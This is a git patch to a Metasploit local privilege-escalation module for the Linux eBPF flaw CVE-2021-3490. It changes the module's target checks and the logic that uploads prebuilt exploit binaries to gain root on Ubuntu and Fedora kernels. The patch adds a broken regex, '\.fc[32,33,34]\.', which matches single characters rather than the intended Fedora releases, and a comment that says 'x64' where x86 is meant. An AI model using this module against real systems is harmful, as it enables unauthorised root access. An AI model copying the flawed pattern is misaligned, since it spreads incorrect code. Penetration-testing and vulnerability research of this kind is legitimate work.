From db5ac81ecf76e1929fe1ed01a8951b2e00dde97c Mon Sep 17 00:00:00 2001
From: Grant Willcox <gwillcox@rapid7.com>
Date: Mon, 23 Aug 2021 13:23:40 -0500
Subject: [PATCH] Fix up mistakes bcoles pointed out and also add in a check to
 ensure we are only targetting x64 systems

---
 ...e_2021_3490_ebpf_alu32_bounds_check_lpe.md |  2 +-
 ...e_2021_3490_ebpf_alu32_bounds_check_lpe.rb | 24 ++++++++++++++-----
 2 files changed, 19 insertions(+), 7 deletions(-)

diff --git a/documentation/modules/exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe.md b/documentation/modules/exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe.md
index ae3abc20e9..d1dc7096e1 100644
--- a/documentation/modules/exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe.md
+++ b/documentation/modules/exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe.md
@@ -11,7 +11,7 @@ and write in the Linux kernel and therefore achieve arbitrary
 code execution as the `root` user.
 
 The target system must be compiled with eBPF support and not have
-`kernel.unprivileged_bpf_disabled` set to `1`, which prevents unprivileged
+`kernel.unprivileged_bpf_disabled` set, which prevents unprivileged
 users from loading eBPF programs into the kernel. Note that if
 `kernel.unprivileged_bpf_disabled` is enabled this module can still be
 utilized to bypass protections such as SELinux, however the user
diff --git a/modules/exploits/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe.rb b/modules/exploits/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe.rb
index 81ec194764..90c0038eb2 100644
--- a/modules/exploits/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe.rb
+++ b/modules/exploits/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe.rb
@@ -31,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Local
           code execution as the root user.
 
           The target system must be compiled with eBPF support and not have
-          kernel.unprivileged_bpf_disabled set to 1, which prevents unprivileged
+          kernel.unprivileged_bpf_disabled set, which prevents unprivileged
           users from loading eBPF programs into the kernel. Note that if
           kernel.unprivileged_bpf_disabled is enabled this module can still be
           utilized to bypass protections such as SELinux, however the user
@@ -80,6 +80,18 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
+    arch = kernel_hardware
+
+    # Could we potentially support x86? Yes, potentially. Will we? Well considering the 5.7 kernel was released
+    # in 2020 and official support for x64 kernels ended in 2012 with
+    # https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=743aa456c1834f76982af44e8b71d1a0b2a82e2
+    # combined with the fact that those distros that do have older x86 versions mostly have 4.x or older kernels,
+    # and 90% of them have dropped support for x86 kernels a while back, we'll just assume that if its x86, its probably not
+    # running an affected Linux kernel.
+    unless arch.include?('x86_64')
+      return CheckCode::Safe("System architecture #{arch} is not supported")
+    end
+
     if unprivileged_bpf_disabled?
       return CheckCode::Safe('Unprivileged BPF loading is not permitted')
     end
@@ -106,7 +118,7 @@ class MetasploitModule < Msf::Exploit::Local
       elsif (Rex::Version.new(major_version) != Rex::Version.new('5.8.0')) && (Rex::Version.new(major_version) != Rex::Version.new('5.11.0'))
         return CheckCode::Unknown('Unknown target kernel version, recommend manually checking if target kernel is vulnerable.')
       end
-    elsif release =~ /\.fc32\./
+    elsif release =~ /\.fc[32,33,34]\./
       version_array = release.split('-')
       major_version = version_array[0]
       minor_version = version_array[1].split('.')[0]
@@ -154,13 +166,13 @@ class MetasploitModule < Msf::Exploit::Local
     major_version = release.split('-')[0]
     if (Rex::Version.new(major_version) == Rex::Version.new('5.11.0'))
       upload_and_chmodx(executable_path, exploit_data('cve-2021-3490', 'hirsute.bin'))
-    elsif release =~ /\.fc32\./ && major_version =~ /5\.7/
+    elsif release =~ /\.fc[32,33,34]\./ && major_version =~ /5\.7/
       upload_and_chmodx(executable_path, exploit_data('cve-2021-3490', 'fedora-5-7.bin'))
-    elsif release =~ /\.fc32\./ && major_version =~ /5\.8/
+    elsif release =~ /\.fc[32,33,34]\./ && major_version =~ /5\.8/
       upload_and_chmodx(executable_path, exploit_data('cve-2021-3490', 'fedora-5-8.bin'))
-    elsif release =~ /\.fc32\./ && major_version =~ /5\.9/
+    elsif release =~ /\.fc[32,33,34]\./ && major_version =~ /5\.9/
       upload_and_chmodx(executable_path, exploit_data('cve-2021-3490', 'fedora-5-9.bin'))
-    elsif release =~ /\.fc32\./ && major_version =~ /5\.10/
+    elsif release =~ /\.fc[32,33,34]\./ && major_version =~ /5\.10/
       upload_and_chmodx(executable_path, exploit_data('cve-2021-3490', 'fedora-5-10.bin'))
     else
       upload_and_chmodx(executable_path, exploit_data('cve-2021-3490', 'groovy.bin'))